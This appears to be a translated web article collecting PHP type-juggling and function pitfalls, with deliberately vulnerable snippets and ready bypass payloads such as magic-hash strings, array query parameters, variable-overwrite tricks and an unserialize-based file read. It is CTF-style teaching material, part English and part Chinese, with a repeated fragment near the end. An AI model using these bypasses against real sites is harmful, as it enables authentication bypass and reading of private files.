Home > Article > Backend Development > Sharing a collection of vulnerabilities in PHP functions
Common payloads include
0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a s214587387a 0x02 sha1(str) sha1('aaroZmOk') sha1('aaK1STfY') sha1('aaO8zKZF') sha1('aa3OFF9m')At the same time, MD5 cannot process arrays. If the following judgments are made, arrays can be used to bypass
if(@md5($_GET['a']) == @md5($_GET['b'])) { echo "yes"; } //http://127.0.0.1/1.php?a[]=1&b[]=2
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE
Here if $_GET['password'] is an array, the return value is NULL
If it is 123 || asd || 12as || 123%00&&&* *, the return value is true
The rest is false
<?php print_r(@$_GET); foreach ($_GET AS $key => $value) { print $key."\n"; }?>
<?php $auth = '0'; // 这里可以覆盖$auth的变量值 print_r($_GET); echo "</br>"; extract($_GET); if($auth == 1){ echo "private!"; } else{ echo "public!"; } ?>extract can receive an array and then give it again Variable assignment, procedure page is very simple.
<?php $a='hi'; foreach($_GET as $key => $value) { echo $key."</br>".$value; $$key = $value; } print "</br>".$a;?>Construction
http://127.0.0.1:8080/test.php?a=12 can achieve the purpose.
如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。 先将两个参数先转换成string类型。 当比较数组和字符串的时候,返回是0。 如果参数不是string类型,直接return
<?php $password=$_GET['password']; if (strcmp('xd',$password)) { echo 'NO!'; } else{ echo 'YES!'; }?>
http://127.0.0.1:8080/test.php?password[]=
<?phpecho is_numeric(233333); # 1echo is_numeric('233333'); # 1echo is_numeric(0x233333); # 1echo is_numeric('0x233333'); # 1echo is_numeric('233333abc'); # 0?>
If in progress When matching regular expressions, if there are no restrictions on the beginning and end of the string (^ and $), there may be bypass problems
<?php$ip = 'asd 1.1.1.1 abcd'; // 可以绕过if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) { die('error'); } else { echo('key...'); }?>
A type of time variable coverage
<?php $var='init'; print $var."</br>"; parse_str($_SERVER['QUERY_STRING']); echo $_SERVER['QUERY_STRING']."</br>"; print $var;?>
<?php echo 0 == 'a' ;// a 转换为数字为 0 重点注意 // 0x 开头会被当成16进制54975581388的16进制为 0xccccccccc // 十六进制与整数,被转换为同一进制比较 '0xccccccccc' == '54975581388' ; // 字符串在与数字比较前会自动转换为数字,如果不能转换为数字会变成0 1 == '1'; 1 == '01'; 10 == '1e1'; '100' == '1e2' ; // 十六进制数与带空格十六进制数,被转换为十六进制整数 '0xABCdef' == ' 0xABCdef'; echo '0010e2' == '1e3'; // 0e 开头会被当成数字,又是等于 0*10^xxx=0 // 如果 md5 是以 0e 开头,在做比较的时候,可以用这种方法绕过 '0e509367213418206700842008763514' == '0e481036490867661113260034900752'; '0e481036490867661113260034900752' == '0' ; var_dump(md5('240610708') == md5('QNKCDZO')); var_dump(md5('aabg7XSs') == md5('aabC9RqS')); var_dump(sha1('aaroZmOk') == sha1('aaK1STfY')); var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));?>
<?php $_CONFIG['extraSecure'] = true;foreach(array('_GET','_POST') as $method) { foreach($$method as $key=>$value) { // $key == _CONFIG // $$key == $_CONFIG // 这个函数会把 $_CONFIG 变量销毁 unset($$key); } }if ($_CONFIG['extraSecure'] == false) { echo 'flag {****}'; }?>
$var = 5; 方式1:$item = (string)$var; 方式2:$item = strval($var);string to int: intval() function.
var_dump(intval('2')) //2 var_dump(intval('3abcd')) //3 var_dump(intval('abcd')) //0 可以使用字符串-0转换,来自于wechall的方法Explanation: When converting intval(), it will convert from the beginning of the string until it encounters a non-numeric character. Even if a string that cannot be converted appears, intval() will not report an error but return 0
By the way, intval can be truncated by %00
if($req['number']!=strval(intval($req['number']))){ $info = "number must be equal to it's integer!! "; }If $req['number']=0% 00 can bypass
<?php $i ="abc"; switch ($i) { case 0: case 1: case 2: echo "i is less than 3 but not negative"; break; case 3: echo "i is 3"; } ?>
$array=[0,1,2,'3']; var_dump(in_array('abc', $array)); //true var_dump(in_array('1bc', $array)); //true
这里我们先简单介绍一下php中的魔术方法(这里如果对于类、对象、方法不熟的先去学学吧),即Magic方法,php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct,__toString,__sleep,__wakeup等等。这些函数都会在某些特殊时候被自动调用。 例如__construct()方法会在一个对象被创建时自动调用,对应的__destruct则会在一个对象被销毁时调用等等。 这里有两个比较特别的Magic方法,__sleep 方法会在一个对象被序列化的时候调用。 __wakeup方法会在一个对象被反序列化的时候调用。
<?phpclass test{ public $username = ''; public $password = ''; public $file = ''; public function out(){ echo "username: ".$this->username."<br>"."password: ".$this->password ; } public function __toString() { return file_get_contents($this->file); } }$a = new test();$a->file = 'C:\Users\YZ\Desktop\plan.txt';echo serialize($a);?>//tostring方法会在输出实例的时候执行,如果实例路径是隐秘文件就可以读取了
<?phpclass test{ public $username = ''; public $password = ''; public $file = ''; public function out(){ echo "username: ".$this->username."<br>"."password: ".$this->password ; } public function __toString() { return file_get_contents($this->file); } }$a = 'O:4:"test":3:{s:8:"username";s:0:"";s:8:"password";s:0:"";s:4:"file";s:28:"C:\Users\YZ\Desktop\plan.txt";}';echo unserialize($a);?>
ini_set('session.serialize_handler', 'php_serialize');
ini_set('session.serialize_handler' , 'php');
The two handle sessions differently
\Users\YZ\Desktop\plan.txt";}';echo unserialize($a);?>
ini_set('session.serialize_handler', 'php_serialize');
ini_set(' session.serialize_handler', 'php');
The two methods of handling sessions are different
Related recommendations:
Some common security vulnerabilities in php websites and corresponding preventive measures
phpAbout deserialization object injection vulnerability
Recommended 9 articles about file vulnerabilities
The above is the detailed content of Sharing a collection of vulnerabilities in PHP functions. For more information, please follow other related articles on the PHP Chinese website!